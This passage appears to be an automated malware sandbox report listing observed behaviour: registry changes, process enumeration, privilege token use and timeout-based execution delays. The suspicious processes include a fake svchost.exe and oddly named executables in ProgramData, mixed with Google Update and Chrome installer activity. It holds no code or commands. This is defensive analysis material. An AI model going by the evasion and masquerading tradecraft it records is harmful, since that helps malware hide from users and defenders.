Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000093e121f86f36c8370000000000000000000000000000000000000000000000000000000000000000000000000000000000001071020000000000c01200000000ffffffff00000000270101000088380193e121f80000000000001071020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d083020000000000c050e1000000ffffffff000000000700010000e8410193e121f8000000000000d08302000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090d4e30000000000000005000000ffffffff00000000070001000048ea7193e121f800000000000090d4e300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000093e121f800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846529567858747" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ = "IAppCommandWeb" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass\CurVer\ = "GoogleUpdate.CoreMachineClass.1" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\VersionIndependentProgID\ = "GoogleUpdate.PolicyStatusMachineFallback" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromePDF\ = "Chrome PDF Document" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\ = "IGoogleUpdate3" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher.1.0\ = "Google Update Process Launcher Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\ = "ICredentialDialog" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher\CurVer\ = "GoogleUpdate.ProcessLauncher.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods\ = "8" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassSvc\CLSID\ = "{9465B4B4-5216-4042-9A2C-754D3BCDC410}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\1.0\0\win32 C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods\ = "9" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ = "IJobObserver2" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass\ = "Google Update Core Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromePDF\shell\open\command C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ = "IAppVersion" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ = "IAppCommandWeb" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\LOCALSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\1.0\0\win32\ = "C:\\Program Files\\Google\\Chrome\\Application\\133.0.6943.127\\elevation_service.exe" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\NumMethods\ = "10" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Packas\scrok.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
